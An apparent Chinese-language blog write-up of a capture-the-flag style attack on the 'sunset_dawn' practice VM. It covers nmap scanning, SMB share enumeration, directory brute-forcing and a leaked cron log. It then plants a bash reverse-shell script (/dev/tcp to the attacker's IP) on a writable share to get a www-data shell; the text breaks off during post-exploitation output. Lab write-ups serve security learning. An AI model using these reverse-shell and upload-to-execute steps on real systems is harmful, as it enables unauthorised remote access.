

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="I3eg1nner">
  <meta name="keywords" content="">
  
    <meta name="description" content="sunset_dawn 靶机信息收集1234567891011121314┌──(kali㉿kali)-[~&#x2F;Downloads&#x2F;dawn]└─$ sudo nmap --min-rate 10000 -p- 192.168.56.134Starting Nmap 7.94 ( https:&#x2F;&#x2F;nmap.org ) at 2023-08-12 13:21 EDTNmap scan report f">
<meta property="og:type" content="article">
<meta property="og:title" content="sunset_dawn 靶机">
<meta property="og:url" content="https://i3eg1nner.github.io/2023/08/5d3dbe7ff791.html">
<meta property="og:site_name" content="I3eg1nner&#39;s blog">
<meta property="og:description" content="sunset_dawn 靶机信息收集1234567891011121314┌──(kali㉿kali)-[~&#x2F;Downloads&#x2F;dawn]└─$ sudo nmap --min-rate 10000 -p- 192.168.56.134Starting Nmap 7.94 ( https:&#x2F;&#x2F;nmap.org ) at 2023-08-12 13:21 EDTNmap scan report f">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i3eg1nner.github.io/pic/9b7c85c695c6864d446624ac5ac3407d_MD5.png">
<meta property="og:image" content="https://i3eg1nner.github.io/pic/84f2fa0ffe6905abef075e3736788df7_MD5.png">
<meta property="og:image" content="https://i3eg1nner.github.io/pic/4fa48da37429639e64d9e552e4f5a19b_MD5.png">
<meta property="og:image" content="https://i3eg1nner.github.io/pic/ab90672e5df01e38b3791b8270f8f438_MD5.png">
<meta property="og:image" content="https://i3eg1nner.github.io/pic/d4a38812ad23e72bd0dcc585cc94ea06_MD5.png">
<meta property="article:published_time" content="2023-08-12T17:42:00.000Z">
<meta property="article:modified_time" content="2023-08-21T15:34:21.136Z">
<meta property="article:author" content="I3eg1nner">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://i3eg1nner.github.io/pic/9b7c85c695c6864d446624ac5ac3407d_MD5.png">
  
  
  
  <title>sunset_dawn 靶机 - I3eg1nner&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"i3eg1nner.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>I3eg1nner</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="sunset_dawn 靶机"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-08-13 01:42" pubdate>
          2023年8月13日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          13k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          106 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sunset_dawn 靶机</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="sunset-dawn-靶机"><a href="#sunset-dawn-靶机" class="headerlink" title="sunset_dawn 靶机"></a>sunset_dawn 靶机</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ sudo nmap --min-rate 10000 -p- 192.168.56.134<br>Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-12 13:21 EDT<br>Nmap scan report <span class="hljs-keyword">for</span> 192.168.56.134<br>Host is up (0.00035s latency).<br>Not shown: 65531 closed tcp ports (reset)<br>PORT     STATE SERVICE<br>80/tcp   open  http<br>139/tcp  open  netbios-ssn<br>445/tcp  open  microsoft-ds<br>3306/tcp open  mysql<br>MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)<br><br>Nmap <span class="hljs-keyword">done</span>: 1 IP address (1 host up) scanned <span class="hljs-keyword">in</span> 9.46 seconds<br></code></pre></td></tr></table></figure>

<p>开放了 80,139,445,3306 端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ sudo nmap -sT -sV -sC -O -p80,139,445,3306 192.168.56.134<br>Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-12 13:24 EDT<br>Nmap scan report <span class="hljs-keyword">for</span> 192.168.56.134<br>Host is up (0.00031s latency).<br><br>PORT     STATE SERVICE     VERSION<br>80/tcp   open  http        Apache httpd 2.4.38 ((Debian))<br>|_http-server-header: Apache/2.4.38 (Debian)<br>|_http-title: Site doesn\<span class="hljs-string">&#x27;t have a title (text/html).</span><br><span class="hljs-string">139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</span><br><span class="hljs-string">445/tcp  open              Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)</span><br><span class="hljs-string">3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1</span><br><span class="hljs-string">| mysql-info: </span><br><span class="hljs-string">|   Protocol: 10</span><br><span class="hljs-string">|   Version: 5.5.5-10.3.15-MariaDB-1</span><br><span class="hljs-string">|   Thread ID: 16</span><br><span class="hljs-string">|   Capabilities flags: 63486</span><br><span class="hljs-string">|   Some Capabilities: Support41Auth, ConnectWithDatabase, SupportsLoadDataLocal, Speaks41ProtocolNew, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsTransactions, InteractiveClient, DontAllowDatabaseTableColumn, FoundRows, IgnoreSigpipes, ODBCClient, SupportsCompression, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults</span><br><span class="hljs-string">|   Status: Autocommit</span><br><span class="hljs-string">|   Salt: &amp;@QV;b_5*ouz)ZgzO[\=</span><br><span class="hljs-string">|_  Auth Plugin Name: mysql_native_password</span><br><span class="hljs-string">MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)</span><br><span class="hljs-string">Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</span><br><span class="hljs-string">Device type: general purpose</span><br><span class="hljs-string">Running: Linux 3.X|4.X</span><br><span class="hljs-string">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span><br><span class="hljs-string">OS details: Linux 3.2 - 4.9</span><br><span class="hljs-string">Network Distance: 1 hop</span><br><span class="hljs-string">Service Info: Host: DAWN</span><br><span class="hljs-string"></span><br><span class="hljs-string">Host script results:</span><br><span class="hljs-string">| smb-os-discovery: </span><br><span class="hljs-string">|   OS: Windows 6.1 (Samba 4.9.5-Debian)</span><br><span class="hljs-string">|   Computer name: dawn</span><br><span class="hljs-string">|   NetBIOS computer name: DAWN\x00</span><br><span class="hljs-string">|   Domain name: dawn</span><br><span class="hljs-string">|   FQDN: dawn.dawn</span><br><span class="hljs-string">|_  System time: 2023-08-12T13:24:44-04:00</span><br><span class="hljs-string">|_clock-skew: mean: 1h19m57s, deviation: 2h18m33s, median: -2s</span><br><span class="hljs-string">| smb-security-mode: </span><br><span class="hljs-string">|   account_used: guest</span><br><span class="hljs-string">|   authentication_level: user</span><br><span class="hljs-string">|   challenge_response: supported</span><br><span class="hljs-string">|_  message_signing: disabled (dangerous, but default)</span><br><span class="hljs-string">|_nbstat: NetBIOS name: DAWN, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)</span><br><span class="hljs-string">| smb2-time: </span><br><span class="hljs-string">|   date: 2023-08-12T17:24:44</span><br><span class="hljs-string">|_  start_date: N/A</span><br><span class="hljs-string">| smb2-security-mode: </span><br><span class="hljs-string">|   3:1:1: </span><br><span class="hljs-string">|_    Message signing enabled but not required</span><br><span class="hljs-string"></span><br><span class="hljs-string">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="hljs-string">Nmap done: 1 IP address (1 host up) scanned in 19.87 seconds</span><br></code></pre></td></tr></table></figure>

<p>Debian 操作系统，Apache httpd 2.4.38</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ sudo nmap --top-ports 20 -sU 192.168.56.134              <br>[sudo] password <span class="hljs-keyword">for</span> kali: <br>Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 11:11 EDT<br>Nmap scan report <span class="hljs-keyword">for</span> 192.168.56.134<br>Host is up (0.00032s latency).<br><br>PORT      STATE         SERVICE<br>53/udp    open|filtered domain<br>67/udp    closed        dhcps<br>68/udp    open|filtered dhcpc<br>69/udp    closed        tftp<br>123/udp   closed        ntp<br>135/udp   closed        msrpc<br>137/udp   open          netbios-ns<br>138/udp   open|filtered netbios-dgm<br>139/udp   closed        netbios-ssn<br>161/udp   closed        snmp<br>162/udp   closed        snmptrap<br>445/udp   closed        microsoft-ds<br>500/udp   closed        isakmp<br>514/udp   closed        syslog<br>520/udp   open|filtered route<br>631/udp   open|filtered ipp<br>1434/udp  open|filtered ms-sql-m<br>1900/udp  open|filtered upnp<br>4500/udp  closed        nat-t-ike<br>49152/udp open|filtered unknown<br>MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)<br><br>Nmap <span class="hljs-keyword">done</span>: 1 IP address (1 host up) scanned <span class="hljs-keyword">in</span> 14.04 seconds<br></code></pre></td></tr></table></figure>

<p>UDP 端口无收获</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ sudo nmap --script=vuln -p80,139,445,3306 192.168.56.134<br>Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 11:17 EDT<br>Pre-scan script results:<br>| broadcast-avahi-dos: <br>|   Discovered hosts:<br>|     224.0.0.251<br>|   After NULL UDP avahi packet DoS (CVE-2011-1002).<br>|_  Hosts are all up (not vulnerable).<br>Nmap scan report <span class="hljs-keyword">for</span> 192.168.56.134<br>Host is up (0.00031s latency).<br><br>PORT     STATE SERVICE<br>80/tcp   open  http<br>|_http-dombased-xss: Couldn\<span class="hljs-string">&#x27;t find any DOM based XSS.</span><br><span class="hljs-string">|_http-csrf: Couldn\&#x27;</span>t find any CSRF vulnerabilities.<br>|_http-stored-xss: Couldn\<span class="hljs-string">&#x27;t find any stored XSS vulnerabilities.</span><br><span class="hljs-string">| http-enum: </span><br><span class="hljs-string">|_  /logs/: Logs</span><br><span class="hljs-string">139/tcp  open  netbios-ssn</span><br><span class="hljs-string">445/tcp  open  microsoft-ds</span><br><span class="hljs-string">3306/tcp open  mysql</span><br><span class="hljs-string">|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)</span><br><span class="hljs-string">MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)</span><br><span class="hljs-string"></span><br><span class="hljs-string">Host script results:</span><br><span class="hljs-string">|_smb-vuln-ms10-061: false</span><br><span class="hljs-string">| smb-vuln-regsvc-dos: </span><br><span class="hljs-string">|   VULNERABLE:</span><br><span class="hljs-string">|   Service regsvc in Microsoft Windows systems vulnerable to denial of service</span><br><span class="hljs-string">|     State: VULNERABLE</span><br><span class="hljs-string">|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference</span><br><span class="hljs-string">|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes</span><br><span class="hljs-string">|       while working on smb-enum-sessions.</span><br><span class="hljs-string">|_          </span><br><span class="hljs-string">|_smb-vuln-ms10-054: false</span><br><span class="hljs-string"></span><br><span class="hljs-string">Nmap done: 1 IP address (1 host up) scanned in 71.14 seconds</span><br></code></pre></td></tr></table></figure>

<p>80 端口发现 logs 目录</p>
<h2 id="ftp-和-MySQL-渗透"><a href="#ftp-和-MySQL-渗透" class="headerlink" title="ftp 和 MySQL 渗透"></a>ftp 和 MySQL 渗透</h2><p>尝试一下 ftp 匿名登陆和 MySQL 无密码登录</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ ftp 192.1.1.142           <br>Connected to 192.1.1.142.<br>220 (vsFTPd 3.0.3)<br>Name (192.1.1.142:kali): anonymous<br>331 Please specify the password.<br>Password: <br>530 Login incorrect.<br>ftp: Login failed<br><br>┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ mysql -u root -h 192.168.56.134 -p<br>Enter password: <br>ERROR 1045 (28000): Access denied <span class="hljs-keyword">for</span> user <span class="hljs-string">&#x27;root&#x27;</span>@<span class="hljs-string">&#x27;192.168.56.106&#x27;</span> (using password: NO)<br></code></pre></td></tr></table></figure>

<h2 id="smb-渗透"><a href="#smb-渗透" class="headerlink" title="smb 渗透"></a>smb 渗透</h2><p>尝试登录 smb</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ sudo smbmap -H 192.168.56.134      <br>[sudo] password <span class="hljs-keyword">for</span> kali: <br>[+] IP: 192.168.56.134:445      Name: 192.168.56.134                                    <br>        Disk                                                    Permissions     Comment<br>        ----                                                    -----------     -------<br>        <span class="hljs-built_in">print</span>$                                                  NO ACCESS       Printer Drivers<br>        ITDEPT                                                  READ ONLY       PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.<br>        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.5-Debian)<br>                                                                                                                    <br>┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ smbclient //192.168.56.134/ITDEPT  <br>Password <span class="hljs-keyword">for</span> [WORKGROUP\kali]:<br>Try <span class="hljs-string">&quot;help&quot;</span> to get a list of possible commands.<br>smb: \&gt; <span class="hljs-built_in">ls</span><br>  .                                   D        0  Fri Aug  2 23:23:20 2019<br>  ..                                  D        0  Fri Aug  2 23:21:39 2019<br><br>                7158264 blocks of size 1024. 0 blocks available<br>smb: \&gt; <span class="hljs-built_in">pwd</span><br>Current directory is \\192.168.56.134\ITDEPT\<br></code></pre></td></tr></table></figure>

<p>可以登录但是空空如也，尝试了一下，可以上传文件，没有进一步的信息可以利用，先去网站看看</p>
<h2 id="目录爆破"><a href="#目录爆破" class="headerlink" title="目录爆破"></a>目录爆破</h2><p>查看 web 界面的同时开始目录爆破</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ sudo dirsearch -u http://192.168.56.134 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <br>[sudo] password <span class="hljs-keyword">for</span> kali: <br><br>  _|. _ _  _  _  _ _|_    v0.4.2<br> (_||| _) (/_(_|| (_| )<br><br>Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220545<br><br>Output File: /root/.dirsearch/reports/192.168.56.134/_23-08-12_14-35-08.txt<br><br>Error Log: /root/.dirsearch/logs/errors-23-08-12_14-35-08.<span class="hljs-built_in">log</span><br><br>Target: http://192.168.56.134/<br><br>[14:35:08] Starting: <br>[14:35:12] 301 -  315B  - /logs  -&gt;  http://192.168.56.134/logs/           <br>[14:35:25] 301 -  315B  - /cctv  -&gt;  http://192.168.56.134/cctv/           <br>[14:38:41] 403 -  302B  - /server-status<br></code></pre></td></tr></table></figure>

<p>尝试访问 logs 和 cctv 目录，cctv 无权限，logs 目录可以看到文件列表</p>
<p><img src="/pic/9b7c85c695c6864d446624ac5ac3407d_MD5.png" srcset="/img/loading.gif" lazyload></p>
<p>再一次对 cctv 目录进行爆破，防止漏信息</p>
<p><img src="/pic/84f2fa0ffe6905abef075e3736788df7_MD5.png" srcset="/img/loading.gif" lazyload></p>
<p>全是 404 和 403，看来突破口不在这</p>
<h2 id="日志文件泄露"><a href="#日志文件泄露" class="headerlink" title="日志文件泄露"></a>日志文件泄露</h2><p>回看 logs 目录，发现前几个文件都没有权限范围，management.log 打开是一个日志信息，通过观察发现文件应该是由 pspy64 生成的。但却没有进一步的信息，我在这里遇到了很大的问题，日志文件中没有什么有价值的信息</p>
<p><img src="/pic/4fa48da37429639e64d9e552e4f5a19b_MD5.png" srcset="/img/loading.gif" lazyload></p>
<p>刚开始我以为是乱码问题导致的，换了几种编码方式都没有预想中的效果，在这里又尝试了对 ftp 和 MySQL 进行了密码爆破，但都失败了，80 端口界面中没有特别有价值的信息</p>
<p><img src="/pic/ab90672e5df01e38b3791b8270f8f438_MD5.png" srcset="/img/loading.gif" lazyload></p>
<p>这里真的快山穷水尽了，卡了一整天，没办法选择了看 WP，而别人笔记里的 management.log 是有提示信息的，经过再一次排查，我发现我的日志信息里没有更新进一步的信息，而正常打靶的笔记里，这个文件是会定时更新的。尝试先恢复快照再重启，重新打开日志目录，发现 management.log 文件大概 3 min 刷新一次，这才是正常的靶机环境……</p>
<h2 id="定时任务Getshell"><a href="#定时任务Getshell" class="headerlink" title="定时任务Getshell"></a>定时任务Getshell</h2><p>有点无语，接着打吧，后续的过程就简单很多了，首先看看日志文件里的信息</p>
<p><img src="/pic/d4a38812ad23e72bd0dcc585cc94ea06_MD5.png" srcset="/img/loading.gif" lazyload></p>
<p>应当是一个定时任务，而其中的目录信息和我们刚才 smb 共享的目录名是同一个，这就比较有意思了</p>
<p>我们可以尝试通过 smb 上传同名的恶意文件到 ITDEPT 目录中，然后等待反弹 shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ <span class="hljs-built_in">cat</span> web-control         <br><span class="hljs-comment">#!/bin/bash</span><br>/bin/bash -i &gt;&amp; /dev/tcp/192.68.156.106/443 0&gt;&amp;1<br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">smb: \&gt; put web-control <br>putting file web-control as \web-control (3.1 kb/s) (average 3.7 kb/s)<br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/Downloads/dawn]<br>└─$ sudo nc -lvnp 443<br>listening on [any] 443 ...<br>connect to [192.168.56.106] from (UNKNOWN) [192.168.56.134] 40794<br>sh: 0: can\<span class="hljs-string">&#x27;t access tty; job control turned off</span><br><span class="hljs-string">$ whoami</span><br><span class="hljs-string">www-data</span><br><span class="hljs-string">$ id</span><br><span class="hljs-string">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br><span class="hljs-string">$ uname -a</span><br><span class="hljs-string">Linux dawn 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64 GNU/Linux</span><br><span class="hljs-string">$ ip a</span><br><span class="hljs-string">1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000</span><br><span class="hljs-string">    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00</span><br><span class="hljs-string">    inet 127.0.0.1/8 scope host lo</span><br><span class="hljs-string">       valid_lft forever preferred_lft forever</span><br><span class="hljs-string">    inet6 ::1/128 scope host </span><br><span class="hljs-string">       valid_lft forever preferred_lft forever</span><br><span class="hljs-string">2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000</span><br><span class="hljs-string">    link/ether 08:00:27:84:97:e0 brd ff:ff:ff:ff:ff:ff</span><br><span class="hljs-string">    inet 192.168.56.134/24 brd 